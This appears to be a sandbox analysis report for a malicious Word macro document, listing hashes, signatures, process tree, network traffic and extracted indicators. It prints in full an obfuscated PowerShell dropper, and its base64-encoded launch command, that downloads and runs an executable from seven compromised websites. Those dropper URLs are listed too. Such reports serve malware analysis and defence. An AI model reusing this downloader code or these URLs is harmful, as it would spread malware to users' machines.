Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/09/2024, 03:57 UTC

General

  • Target

    f9aa43fd07fd831aa3938317df777884_JaffaCakes118.doc

  • Size

    143KB

  • MD5

    f9aa43fd07fd831aa3938317df777884

  • SHA1

    ca3c9f652bfb945bdf94f2b4de46cce5b3eb3ed3

  • SHA256

    5f1ea173886baa8208a164cab30480d8362327401dc4782d01aa1caeb3314b9d

  • SHA512

    fde6615e11e8ab41da18ee1fabdcd29ae4597c4355455c109ed220c0dae177af0b6ec620161c408b9c9b1328ebf8411b85543f81a2409abe484387ab8d44aed3

  • SSDEEP

    1536:ALRD3bNqfNpu39IId5a6XP3Mg8afCqaIoF3Cgar3Pd0MZXiNjLooT:8R1qf69xak3MgxCCoMFr3Pd0MZXiNPvT

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$Aq3qi8j=('N'+('e'+'xhh')+'m5');&('ne'+'w-ite'+'m') $EnV:UseRproFilE\Zqx41rP\OnFoGa8\ -itemtype DirEctory;[Net.ServicePointManager]::"SeCu`RItypR`O`ToCol" = ('tl'+('s'+'12, tls1')+'1,'+' t'+'ls');$J9g_adk = ('E0'+('jn'+'w')+'y3');$Jzg4_0_=('Bn'+('_vl6'+'h'));$M503fem=$env:userprofile+(('EY'+'B'+('Zqx'+'41r'+'p')+('EY'+'BOnfog'+'a8'+'EY')+'B')."R`ePLace"(('E'+'YB'),'\'))+$J9g_adk+('.'+('e'+'xe'));$Eqkv5ic=(('N3'+'j')+('h2t'+'g'));$Br9ijhy=&('new-ob'+'j'+'ect') nEt.WEbclIeNt;$I6kafnl=('ht'+'t'+('p'+'s:'+'//s'+'hop.mtcss.co'+'.')+'u'+('k/'+'w')+('p-ad'+'m'+'in/US'+'QF')+'Pj'+('/*'+'htt')+('ps:/'+'/h')+('andf'+'i')+('nger.'+'c')+'o'+'m'+('/wp-'+'i'+'ncl')+('u'+'des/iC'+'Y/*h'+'t')+('tp:'+'/'+'/hanu')+'l'+('mo'+'tor')+'s'+('.com'+'/'+'nbq'+'s')+('o/8'+'T')+('z'+'/*')+('htt'+'p:'+'//he')+('lpi'+'nghand'+'s4n'+'ee'+'d')+('y.o'+'rg')+('/w'+'p-con'+'t')+('e'+'nt')+('/Lgr'+'I9'+'g/')+('*htt'+'p://'+'w')+('ww.'+'eco'+'barato'+'canari'+'a.com')+'/'+'wo'+'rd'+('p'+'ress/')+('Jt/'+'*')+('h'+'tt')+('p:/'+'/ma'+'cerin')+'d'+'ia'+('.'+'com/w'+'p-con'+'tent')+'/'+'h'+'R'+('S/*'+'ht')+('tp'+'://cf'+'n.')+('tvs'+'tart'+'up.co')+('m/'+'wp')+('-cont'+'ent/7'+'dNH1L'+'I/'))."S`pliT"([char]42);$R2ct1qi=(('Ek'+'g5')+('mj'+'c'));foreach($Mqnj4jr in $I6kafnl){try{$Br9ijhy."DO`wnLo`ADfi`lE"($Mqnj4jr, $M503fem);$Thggohh=('Q'+('9kh'+'13')+'w');If ((.('G'+'et-Item') $M503fem)."leng`Th" -ge 30237) {&('Invok'+'e-'+'Item')($M503fem);$Q8v4yn2=(('Tptc'+'i')+'8j');break;$Yquma0r=('X7'+('4'+'ga6')+'o')}}catch{}}$Qyzmrtd=('L'+('0x'+'3yd'+'p'))
URLs
exe.dropper

https://shop.mtcss.co.uk/wp-admin/USQFPj/

exe.dropper

https://handfinger.com/wp-includes/iCY/

exe.dropper

http://hanulmotors.com/nbqso/8Tz/

exe.dropper

http://helpinghands4needy.org/wp-content/LgrI9g/

exe.dropper

http://www.ecobaratocanaria.com/wordpress/Jt/

exe.dropper

http://macerindia.com/wp-content/hRS/

exe.dropper

http://cfn.tvstartup.com/wp-content/7dNH1LI/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f9aa43fd07fd831aa3938317df777884_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2276
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2292
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABBAHEAMwBxAGkAOABqAD0AKAAnAE4AJwArACgAJwBlACcAKwAnAHgAaABoACcAKQArACcAbQA1ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAVQBzAGUAUgBwAHIAbwBGAGkAbABFAFwAWgBxAHgANAAxAHIAUABcAE8AbgBGAG8ARwBhADgAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAHUAYABSAEkAdAB5AHAAUgBgAE8AYABUAG8AQwBvAGwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAnACsAJwAxADIALAAgAHQAbABzADEAJwApACsAJwAxACwAJwArACcAIAB0ACcAKwAnAGwAcwAnACkAOwAkAEoAOQBnAF8AYQBkAGsAIAA9ACAAKAAnAEUAMAAnACsAKAAnAGoAbgAnACsAJwB3ACcAKQArACcAeQAzACcAKQA7ACQASgB6AGcANABfADAAXwA9ACgAJwBCAG4AJwArACgAJwBfAHYAbAA2ACcAKwAnAGgAJwApACkAOwAkAE0ANQAwADMAZgBlAG0APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcARQBZACcAKwAnAEIAJwArACgAJwBaAHEAeAAnACsAJwA0ADEAcgAnACsAJwBwACcAKQArACgAJwBFAFkAJwArACcAQgBPAG4AZgBvAGcAJwArACcAYQA4ACcAKwAnAEUAWQAnACkAKwAnAEIAJwApAC4AIgBSAGAAZQBQAEwAYQBjAGUAIgAoACgAJwBFACcAKwAnAFkAQgAnACkALAAnAFwAJwApACkAKwAkAEoAOQBnAF8AYQBkAGsAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABFAHEAawB2ADUAaQBjAD0AKAAoACcATgAzACcAKwAnAGoAJwApACsAKAAnAGgAMgB0ACcAKwAnAGcAJwApACkAOwAkAEIAcgA5AGkAagBoAHkAPQAmACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBFAGIAYwBsAEkAZQBOAHQAOwAkAEkANgBrAGEAZgBuAGwAPQAoACcAaAB0ACcAKwAnAHQAJwArACgAJwBwACcAKwAnAHMAOgAnACsAJwAvAC8AcwAnACsAJwBoAG8AcAAuAG0AdABjAHMAcwAuAGMAbwAnACsAJwAuACcAKQArACcAdQAnACsAKAAnAGsALwAnACsAJwB3ACcAKQArACgAJwBwAC0AYQBkACcAKwAnAG0AJwArACcAaQBuAC8AVQBTACcAKwAnAFEARgAnACkAKwAnAFAAagAnACsAKAAnAC8AKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcABzADoALwAnACsAJwAvAGgAJwApACsAKAAnAGEAbgBkAGYAJwArACcAaQAnACkAKwAoACcAbgBnAGUAcgAuACcAKwAnAGMAJwApACsAJwBvACcAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGkAJwArACcAbgBjAGwAJwApACsAKAAnAHUAJwArACcAZABlAHMALwBpAEMAJwArACcAWQAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvACcAKwAnAC8AaABhAG4AdQAnACkAKwAnAGwAJwArACgAJwBtAG8AJwArACcAdABvAHIAJwApACsAJwBzACcAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKwAnAG4AYgBxACcAKwAnAHMAJwApACsAKAAnAG8ALwA4ACcAKwAnAFQAJwApACsAKAAnAHoAJwArACcALwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwADoAJwArACcALwAvAGgAZQAnACkAKwAoACcAbABwAGkAJwArACcAbgBnAGgAYQBuAGQAJwArACcAcwA0AG4AJwArACcAZQBlACcAKwAnAGQAJwApACsAKAAnAHkALgBvACcAKwAnAHIAZwAnACkAKwAoACcALwB3ACcAKwAnAHAALQBjAG8AbgAnACsAJwB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAnACkAKwAoACcALwBMAGcAcgAnACsAJwBJADkAJwArACcAZwAvACcAKQArACgAJwAqAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAdwAnACkAKwAoACcAdwB3AC4AJwArACcAZQBjAG8AJwArACcAYgBhAHIAYQB0AG8AJwArACcAYwBhAG4AYQByAGkAJwArACcAYQAuAGMAbwBtACcAKQArACcALwAnACsAJwB3AG8AJwArACcAcgBkACcAKwAoACcAcAAnACsAJwByAGUAcwBzAC8AJwApACsAKAAnAEoAdAAvACcAKwAnACoAJwApACsAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoALwAnACsAJwAvAG0AYQAnACsAJwBjAGUAcgBpAG4AJwApACsAJwBkACcAKwAnAGkAYQAnACsAKAAnAC4AJwArACcAYwBvAG0ALwB3ACcAKwAnAHAALQBjAG8AbgAnACsAJwB0AGUAbgB0ACcAKQArACcALwAnACsAJwBoACcAKwAnAFIAJwArACgAJwBTAC8AKgAnACsAJwBoAHQAJwApACsAKAAnAHQAcAAnACsAJwA6AC8ALwBjAGYAJwArACcAbgAuACcAKQArACgAJwB0AHYAcwAnACsAJwB0AGEAcgB0ACcAKwAnAHUAcAAuAGMAbwAnACkAKwAoACcAbQAvACcAKwAnAHcAcAAnACkAKwAoACcALQBjAG8AbgB0ACcAKwAnAGUAbgB0AC8ANwAnACsAJwBkAE4ASAAxAEwAJwArACcASQAvACcAKQApAC4AIgBTAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFIAMgBjAHQAMQBxAGkAPQAoACgAJwBFAGsAJwArACcAZwA1ACcAKQArACgAJwBtAGoAJwArACcAYwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AcQBuAGoANABqAHIAIABpAG4AIAAkAEkANgBrAGEAZgBuAGwAKQB7AHQAcgB5AHsAJABCAHIAOQBpAGoAaAB5AC4AIgBEAE8AYAB3AG4ATABvAGAAQQBEAGYAaQBgAGwARQAiACgAJABNAHEAbgBqADQAagByACwAIAAkAE0ANQAwADMAZgBlAG0AKQA7ACQAVABoAGcAZwBvAGgAaAA9ACgAJwBRACcAKwAoACcAOQBrAGgAJwArACcAMQAzACcAKQArACcAdwAnACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQATQA1ADAAMwBmAGUAbQApAC4AIgBsAGUAbgBnAGAAVABoACIAIAAtAGcAZQAgADMAMAAyADMANwApACAAewAmACgAJwBJAG4AdgBvAGsAJwArACcAZQAtACcAKwAnAEkAdABlAG0AJwApACgAJABNADUAMAAzAGYAZQBtACkAOwAkAFEAOAB2ADQAeQBuADIAPQAoACgAJwBUAHAAdABjACcAKwAnAGkAJwApACsAJwA4AGoAJwApADsAYgByAGUAYQBrADsAJABZAHEAdQBtAGEAMAByAD0AKAAnAFgANwAnACsAKAAnADQAJwArACcAZwBhADYAJwApACsAJwBvACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQB5AHoAbQByAHQAZAA9ACgAJwBMACcAKwAoACcAMAB4ACcAKwAnADMAeQBkACcAKwAnAHAAJwApACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2344

    Network

    • flag-us
      DNS
      shop.mtcss.co.uk
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      shop.mtcss.co.uk
      IN A
      Response
      shop.mtcss.co.uk
      IN A
      165.84.218.143
    • flag-us
      DNS
      handfinger.com
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      handfinger.com
      IN A
      Response
      handfinger.com
      IN A
      108.61.87.182
    • flag-us
      DNS
      hanulmotors.com
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      hanulmotors.com
      IN A
      Response
      hanulmotors.com
      IN A
      107.178.223.183
      hanulmotors.com
      IN A
      104.155.138.21
    • flag-us
      GET
      http://hanulmotors.com/nbqso/8Tz/
      POwersheLL.exe
      Remote address:
      107.178.223.183:80
      Request
      GET /nbqso/8Tz/ HTTP/1.1
      Host: hanulmotors.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Content-Length: 0
    • flag-us
      DNS
      helpinghands4needy.org
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      helpinghands4needy.org
      IN A
      Response
      helpinghands4needy.org
      IN A
      62.72.28.183
    • flag-in
      GET
      http://helpinghands4needy.org/wp-content/LgrI9g/
      POwersheLL.exe
      Remote address:
      62.72.28.183:80
      Request
      GET /wp-content/LgrI9g/ HTTP/1.1
      Host: helpinghands4needy.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Connection: Keep-Alive
      Keep-Alive: timeout=5, max=100
      content-type: text/html
      last-modified: Mon, 11 Sep 2023 19:30:30 GMT
      etag: "999-64ff6ad6-58be6882cd98db7a;;;"
      accept-ranges: bytes
      content-length: 2457
      date: Fri, 27 Sep 2024 03:57:36 GMT
      server: LiteSpeed
      platform: hostinger
      panel: hpanel
    • flag-us
      DNS
      www.ecobaratocanaria.com
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      www.ecobaratocanaria.com
      IN A
      Response
    • flag-us
      DNS
      macerindia.com
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      macerindia.com
      IN A
      Response
      macerindia.com
      IN A
      104.21.51.108
      macerindia.com
      IN A
      172.67.179.125
    • flag-us
      GET
      http://macerindia.com/wp-content/hRS/
      POwersheLL.exe
      Remote address:
      104.21.51.108:80
      Request
      GET /wp-content/hRS/ HTTP/1.1
      Host: macerindia.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Fri, 27 Sep 2024 03:57:36 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      X-UA-Compatible: IE=edge
      Link: <http://macerindia.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rgsg1cuaBm4WkF%2BKZvBmMIfwV7jvr0I%2BC7%2BxOB0hB%2B8YkkgH9zQZPkgF9ldXvCsGZQ2Y7IBADarnyTF07vD2cwuib36LDSX6RggA%2BWO1kHVYHr9Vjv5PX%2BLpk%2BY0kwY3Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Speculation-Rules: "/cdn-cgi/speculation"
      Server: cloudflare
      CF-RAY: 8c98920e3c997765-LHR
    • flag-us
      DNS
      cfn.tvstartup.com
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      cfn.tvstartup.com
      IN A
      Response
      cfn.tvstartup.com
      IN A
      38.86.32.67
    • flag-us
      GET
      http://cfn.tvstartup.com/wp-content/7dNH1LI/
      POwersheLL.exe
      Remote address:
      38.86.32.67:80
      Request
      GET /wp-content/7dNH1LI/ HTTP/1.1
      Host: cfn.tvstartup.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 503 Service Unavailable
      Date: Fri, 27 Sep 2024 03:57:36 GMT
      Server: Apache
      Retry-After: 600
      Connection: close
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=utf-8
    • 165.84.218.143:443
      shop.mtcss.co.uk
      tls
      POwersheLL.exe
      350 B
      219 B
      5
      5
    • 165.84.218.143:443
      shop.mtcss.co.uk
      tls
      POwersheLL.exe
      350 B
      219 B
      5
      5
    • 108.61.87.182:443
      handfinger.com
      tls
      POwersheLL.exe
      348 B
      219 B
      5
      5
    • 108.61.87.182:443
      handfinger.com
      tls
      POwersheLL.exe
      348 B
      219 B
      5
      5
    • 107.178.223.183:80
      http://hanulmotors.com/nbqso/8Tz/
      http
      POwersheLL.exe
      351 B
      250 B
      6
      5

      HTTP Request

      GET http://hanulmotors.com/nbqso/8Tz/

      HTTP Response

      200
    • 62.72.28.183:80
      http://helpinghands4needy.org/wp-content/LgrI9g/
      http
      POwersheLL.exe
      366 B
      3.0kB
      6
      5

      HTTP Request

      GET http://helpinghands4needy.org/wp-content/LgrI9g/

      HTTP Response

      404
    • 104.21.51.108:80
      http://macerindia.com/wp-content/hRS/
      http
      POwersheLL.exe
      1.3kB
      53.3kB
      27
      46

      HTTP Request

      GET http://macerindia.com/wp-content/hRS/

      HTTP Response

      404
    • 38.86.32.67:80
      http://cfn.tvstartup.com/wp-content/7dNH1LI/
      http
      POwersheLL.exe
      362 B
      2.3kB
      6
      7

      HTTP Request

      GET http://cfn.tvstartup.com/wp-content/7dNH1LI/

      HTTP Response

      503
    • 8.8.8.8:53
      shop.mtcss.co.uk
      dns
      POwersheLL.exe
      62 B
      78 B
      1
      1

      DNS Request

      shop.mtcss.co.uk

      DNS Response

      165.84.218.143

    • 8.8.8.8:53
      handfinger.com
      dns
      POwersheLL.exe
      60 B
      76 B
      1
      1

      DNS Request

      handfinger.com

      DNS Response

      108.61.87.182

    • 8.8.8.8:53
      hanulmotors.com
      dns
      POwersheLL.exe
      61 B
      93 B
      1
      1

      DNS Request

      hanulmotors.com

      DNS Response

      107.178.223.183
      104.155.138.21

    • 8.8.8.8:53
      helpinghands4needy.org
      dns
      POwersheLL.exe
      68 B
      84 B
      1
      1

      DNS Request

      helpinghands4needy.org

      DNS Response

      62.72.28.183

    • 8.8.8.8:53
      www.ecobaratocanaria.com
      dns
      POwersheLL.exe
      70 B
      143 B
      1
      1

      DNS Request

      www.ecobaratocanaria.com

    • 8.8.8.8:53
      macerindia.com
      dns
      POwersheLL.exe
      60 B
      92 B
      1
      1

      DNS Request

      macerindia.com

      DNS Response

      104.21.51.108
      172.67.179.125

    • 8.8.8.8:53
      cfn.tvstartup.com
      dns
      POwersheLL.exe
      63 B
      79 B
      1
      1

      DNS Request

      cfn.tvstartup.com

      DNS Response

      38.86.32.67

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      b9b3b2336082afbf88a52b33d8e0715c

      SHA1

      9af482baa7eae6764664794d12eafd04dc68ba1e

      SHA256

      2ebbaa16a14690be371c40f98c3b0e93ce7dad747191e1bb4a5a04d64b764300

      SHA512

      ac6e39a42e3490d692deaccc52f0d228a158f0227a3d3c5af3d46ee710f6268cfe662189994ab5fe102c5e3135d147ddf7a8f647532798f263b0730e61cd243b

    • memory/2276-47-0x0000000005AB0000-0x0000000005BB0000-memory.dmp

      Filesize

      1024KB

    • memory/2276-45-0x0000000005AB0000-0x0000000005BB0000-memory.dmp

      Filesize

      1024KB

    • memory/2276-7-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2276-6-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2276-8-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2276-29-0x0000000005AB0000-0x0000000005BB0000-memory.dmp

      Filesize

      1024KB

    • memory/2276-28-0x0000000005AB0000-0x0000000005BB0000-memory.dmp

      Filesize

      1024KB

    • memory/2276-27-0x0000000005AB0000-0x0000000005BB0000-memory.dmp

      Filesize

      1024KB

    • memory/2276-44-0x0000000005AB0000-0x0000000005BB0000-memory.dmp

      Filesize

      1024KB

    • memory/2276-0-0x000000002FB71000-0x000000002FB72000-memory.dmp

      Filesize

      4KB

    • memory/2276-2-0x00000000713DD000-0x00000000713E8000-memory.dmp

      Filesize

      44KB

    • memory/2276-80-0x00000000713DD000-0x00000000713E8000-memory.dmp

      Filesize

      44KB

    • memory/2276-46-0x0000000005AB0000-0x0000000005BB0000-memory.dmp

      Filesize

      1024KB

    • memory/2276-79-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2276-59-0x00000000713DD000-0x00000000713E8000-memory.dmp

      Filesize

      44KB

    • memory/2276-60-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2276-61-0x0000000005AB0000-0x0000000005BB0000-memory.dmp

      Filesize

      1024KB

    • memory/2276-63-0x0000000005AB0000-0x0000000005BB0000-memory.dmp

      Filesize

      1024KB

    • memory/2276-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2344-54-0x0000000001D90000-0x0000000001D98000-memory.dmp

      Filesize

      32KB

    • memory/2344-53-0x000000001B730000-0x000000001BA12000-memory.dmp

      Filesize

      2.9MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.